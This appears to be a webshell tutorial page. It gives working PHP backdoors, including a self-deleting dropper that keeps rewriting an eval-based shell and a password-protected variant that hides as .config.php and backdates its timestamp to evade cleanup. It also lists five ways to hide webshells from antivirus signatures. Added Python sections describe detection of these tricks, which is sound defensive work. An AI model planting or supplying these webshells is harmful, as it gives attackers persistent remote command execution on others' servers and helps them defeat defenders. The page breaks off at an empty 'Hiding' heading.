Webshell
PHP Backdoor
Here is a PHP backdoor that is extremely hard to delete:
<?php
// Let the script keep executing even if the client disconnects
ignore_user_abort(true);
// Disable script execution time limitation
set_time_limit(0);
// Delete this file itself
unlink(__FILE__);
$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';
// Keep writing the PHP one-liner backdoor into the file
while (1) {
file_put_contents($file, $code);
usleep(5000);
}
?>
It deletes itself by calling unlink(__FILE__) and then keeps writing the webshell code into shell.php. An improved version of this backdoor adds a password in case someone else finds and uses it:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
// Let the webshell be a hidden file
$file = '/var/www/dvwa/.config.php';
// password="super_secret_password"
$code = '<?php if(md5($_POST["pass"])=="a444f0a46019465ed8eb7f42548e6a0f"){@system($_POST[a]);}?>';
while (1) {
file_put_contents($file, $code);
// Modify the modification timestamp to bypass a deletion bash script that keys on mtime
system('touch -m -d "2022-04-25 12:14:32" .config.php');
usleep(5000);
}
?>
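A defender-side check for the timestamp trick above (an added example, not code from the original page): touch -m rewrites only the modification time (mtime). The kernel updates the inode change time (ctime) on every write and on the touch call itself, and no userland option sets ctime backwards, so a file that is rewritten every few milliseconds and then backdated ends up with a ctime far newer than its mtime. Hidden dotfiles with a .php extension in the webroot are a second cheap indicator. The Python script below builds a temporary webroot, backdates a constructed hidden file with os.utime (the same effect as touch -m -d), and lists it with the reasons; the gap threshold, file names and sample contents are assumptions.

```python
import os
import tempfile
import time
from pathlib import Path

# Assumption: a legitimately edited file has ctime within a day of its mtime.
# A larger gap means the inode changed after the content timestamp was set back.
CTIME_GAP_SECONDS = 24 * 3600


def suspicious_files(webroot, gap=CTIME_GAP_SECONDS):
    """Return a sorted list of (relative_path, [reasons]) for files worth a closer look."""
    root = Path(webroot)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        st = path.stat()
        reasons = []
        # Hidden dotfile with a PHP extension: unusual inside a document root.
        if path.name.startswith(".") and path.suffix == ".php":
            reasons.append("hidden .php file")
        # ctime newer than mtime by more than the threshold: mtime was turned back.
        delta = st.st_ctime - st.st_mtime
        if delta > gap:
            reasons.append("ctime newer than mtime by %.0f s" % delta)
        if reasons:
            hits.append((str(path.relative_to(root)), reasons))
    return sorted(hits)


def demo():
    """Constructed scenario: one clean file and one backdated hidden dotfile."""
    with tempfile.TemporaryDirectory() as root:
        clean = Path(root) / "index.php"
        clean.write_text("<?php echo 'hello'; ?>")  # constructed benign content
        hidden = Path(root) / ".config.php"
        hidden.write_text("<?php /* constructed placeholder, not a real shell */ ?>")
        # Emulate `touch -m -d "2022-04-25 12:14:32"`: set atime/mtime back in time.
        old = time.mktime((2022, 4, 25, 12, 14, 32, 0, 0, -1))
        os.utime(hidden, (old, old))
        return suspicious_files(root)


if __name__ == "__main__":
    for rel, why in demo():
        print(rel, "->", "; ".join(why))
```

Running it prints only .config.php, with both reasons. In production the same two checks run over the real document root on a schedule; the ctime gap is visible with stat(1) as well, so the check can be confirmed by hand before any file is removed.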
Antivirus Bypass
Suppose antivirus software matches the patterns <?assert($_REQUEST[;?> and <?eval($_REQUEST[;?>. If either of these two patterns is found, the webshell is detected and deleted. Our objective is to achieve the same functionality without using these two patterns directly.
Idea 1: Define a constant
<?php define("a","$_REQUEST[cmd]");eval(a);?>
Idea 2: Define a function
<?php
function a($a)
{
return $a;
}
eval(a($_REQUEST)['cmd']);
?>
Idea 3: Define a class
<?php
class User
{
public $name='';
function __destruct()
{
eval("$this->name");
}
}
$user=new User;
$user->name=''.$_REQUEST['cmd'];
Idea 4: Parameter
<?php
$COOKIE=$_COOKIE;
foreach($COOKIE as $key=>$value)
{
if($key=='assert')
{
$key($_REQUEST['cmd']);
}
}
Idea 5: get_defined_functions()
<?php
$a=get_defined_functions();
$a['internal'][841]($_REQUEST['cmd']);
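The five ideas above all defeat a scanner that keys on one literal string, but they share structural traits that a scanner can key on instead: request data from a superglobal reaching a code or command sink, a function called through a variable rather than by name, enumeration of the builtin function table, or a script that deletes itself. The Python scanner below (an added example, not code from the original page) encodes those traits as regular expressions and runs them over constructed samples modelled on ideas 1 to 5, the self-deleting dropper, and one benign snippet; the indicator names, scoring rule and samples are assumptions, and the rule is a heuristic for triage, not proof of compromise.

```python
import re

SUPERGLOBALS = re.compile(r"\$_(REQUEST|POST|GET|COOKIE|SERVER|FILES)\b")
# Code and command execution sinks, matched by name regardless of the argument.
SINKS = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
# Variable function calls: $name(...), $arr['k'][0](...) - the callee is data.
DYNAMIC_CALL = re.compile(r"\$[A-Za-z_]\w*(?:\[[^\]]*\])*\s*\(")
# Walking the builtin function table to pick a callable by index.
FUNC_ENUM = re.compile(r"\bget_defined_functions\s*\(")
# A script that removes its own file.
SELF_DELETE = re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)")


def php_indicators(src):
    """Return the list of indicator names found in a PHP source string."""
    reasons = []
    if SUPERGLOBALS.search(src):
        reasons.append("superglobal input")
    sinks = sorted({m.group(1) for m in SINKS.finditer(src)})
    if sinks:
        reasons.append("code/command sink: " + ",".join(sinks))
    if DYNAMIC_CALL.search(src):
        reasons.append("variable function call")
    if FUNC_ENUM.search(src):
        reasons.append("function table enumeration")
    if SELF_DELETE.search(src):
        reasons.append("self-deletion")
    return reasons


def is_suspicious(src):
    """Heuristic (assumed): enumeration or self-deletion alone, or tainted input plus any other trait."""
    reasons = php_indicators(src)
    if "function table enumeration" in reasons or "self-deletion" in reasons:
        return True
    return "superglobal input" in reasons and len(reasons) >= 2


# Constructed samples modelled on the page's ideas; only structure matters here.
SAMPLES = {
    "idea1": '<?php define("a","$_REQUEST[cmd]");eval(a);?>',
    "idea2": "<?php function a($a){return $a;} eval(a($_REQUEST)['cmd']);",
    "idea3": "<?php class User{public $name='';function __destruct(){eval(\"$this->name\");}}"
             "$user=new User;$user->name=''.$_REQUEST['cmd'];",
    "idea4": "<?php $COOKIE=$_COOKIE;foreach($COOKIE as $key=>$value){"
             "if($key=='assert'){$key($_REQUEST['cmd']);}}",
    "idea5": "<?php $a=get_defined_functions();$a['internal'][841]($_REQUEST['cmd']);",
    "dropper": "<?php ignore_user_abort(true);unlink(__FILE__);"
               "while(1){file_put_contents($file,$code);usleep(5000);}",
    "benign": "<?php $name=htmlspecialchars($_GET['name'] ?? 'guest');echo \"Hello, $name\";?>",
}


def scan_samples(samples=SAMPLES):
    """Map each sample name to (suspicious, reasons)."""
    return {name: (is_suspicious(src), php_indicators(src)) for name, src in samples.items()}


if __name__ == "__main__":
    for name, (flag, why) in scan_samples().items():
        print("%-8s %-5s %s" % (name, "FLAG" if flag else "ok", "; ".join(why)))
```

Idea 4 passes the sink regex (the string 'assert' is never followed by a parenthesis) but is caught by the variable call $key(...), and idea 5 is caught by get_defined_functions on its own, which is the point of matching structure rather than one literal. The benign sample uses a superglobal but feeds it only to htmlspecialchars, so it stays below the threshold.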
Hiding